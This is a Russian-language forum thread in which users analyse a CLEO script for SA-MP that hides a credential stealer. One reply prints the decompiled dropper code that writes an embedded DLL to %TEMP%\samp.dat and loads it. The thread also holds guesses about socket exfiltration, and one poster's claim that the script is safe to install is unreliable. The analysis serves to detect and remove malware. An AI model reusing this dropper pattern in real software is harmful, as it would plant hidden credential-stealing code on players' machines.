Проверить файл .cs на стиллер

[Mark_Mamedow]

Знатоки, привет. Мне тут надо проверить файл формата .cs на стиллер.
Через HTTP Analyzer(вроде так называется) проверял - стиллера обнаружено не было.
Желательно ещё рассказать, что этот CLEO скрипт делает или для чего он предназначен.

 

[asdzxcjqwe]

:Label002809
0AA2: 0@ = load_library "kernel32.dll" // IF and SET
0AA4: 1@ = get_proc_address "GetEnvironmentVariableA" library 0@ // IF and SET
alloc 2@ 260
0AA5: call 1@ num_params 3 pop 0 260 2@ "TEMP"
alloc 4@ 260
format 4@ "%s\\samp.dat" 2@
0AA2: 0@ = load_library "msvcrt.dll" // IF and SET
0AA4: 1@ = get_proc_address "fopen" library 0@ // IF and SET
0AA7: call_function 1@ num_params 2 pop 2 "wb" 4@ 3@
0AA4: 1@ = get_proc_address "fwrite" library 0@ // IF and SET
0AC6: 5@ = label @Label000009 offset
0AA5: call 1@ num_params 4 pop 4 3@ 1 10240 5@
0AA4: 1@ = get_proc_address "fclose" library 0@ // IF and SET
0AA5: call 1@ num_params 1 pop 1 3@
0AA2: 6@ = load_library 4@ // IF and SET

:Label002902
wait 100
jump @Label002902

не знаю (не понимаю) что делает, но антивирус сразу вскрикнул когда в игру вошел // ниже

для чего он предназначен

больше ничего не выполняет, его нужно склеивать коннектором с другими скриптами

 

[BlackKnigga]

Стиллер

 

[asdzxcjqwe]

извлекает такой DLL-файл (прикрепил) и сохраняет в %temp% под именем samp.dat
далее подгружает в систему, и после перезахода в игру, даже если удалить .cs файл из папки, стилер будет продолжать работать (перепроверил, подгружает только в игру, после выхода из игры не работает)

ну то, что dll файлик вредоносный, я не сомневаюсь

 

[Mark_Mamedow]

извлекает такой DLL-файл (прикрепил) и сохраняет в %temp% под именем samp.dat
далее подгружает в систему, и после перезахода в игру, даже если удалить .cs файл из папки, стилер будет продолжать работать

ну то, что dll файлик вредоносный, я не сомневаюсь

Крадёт только SAMP аккаунты, я прав?

 

[asdzxcjqwe]

Крадёт только SAMP аккаунты, я прав?

точно не могу сказать, могу только предположить
но думаю да, только самп, но сокеты возможно работают все время

А HTTPAnalyzer(ом) ты ничего не словил, потому что отправка осуществляется не по протоколу http, задействованы сокеты (Winsock видится)

еще не понимаю, как твой антивирь не схавал эту дллку, видимо стоит скачать другой антивирус

 

[Mark_Mamedow]

точно не могу сказать, могу только предположить
но думаю да, только самп, но сокеты возможно работают все время

А HTTPAnalyzer(ом) ты ничего не словил, потому что отправка осуществляется не по протоколу http, задействованы сокеты (Winsock видится)

еще не понимаю, как твой антивирь не схавал эту дллку, видимо стоит скачать другой антивирус

Он-то схавал, вроде как "обезвредил" (у меня Касперский), но сейчас прописал "Выполнить", зашёл в "%temp%", и тут вижу этот samp.dat, удалил его.

 

[asdzxcjqwe]

и тут вижу этот samp.dat, удалил его.

он пустой был значит, раз обезвредил, у меня так же

стилер будет продолжать работать

забыл дописать, что после перезагрузки его уже не будет, или после самостоятельной выгрузки

 

[Mark_Mamedow]

он пустой был значит, раз обезвредил, у меня так же

Что-то волнуюсь, что все аккаунты украдёт(в том числе и кроме SAMPa), но пароль от ВК, от некоторых аккаунтов SAMP и электронных почт я уже сменил.

 

[asdzxcjqwe]

что ты паришься? удали файл, перезагрузи комп для подстраховки и забудь, такая маленькая программка на большее не способна, чем воровать введенные тексты с диалогов, в автозагрузку себя также не пихает
тем более твой антивирус обезвредил файл до того, как он успел подгрузиться


----
крипт у скрипта плохой, достал прототипом CDD (1), длл палится антивирусом (2), не знаю на что рассчитывал разработчик, может быть версия стилера старая

 

[DarkP1xel]

Можно спокойно устанавливать и играть со скриптом, стилер в нём спокойно блокируется.

 

[Mark_Mamedow]

Большое всем спасибо. :pidrila: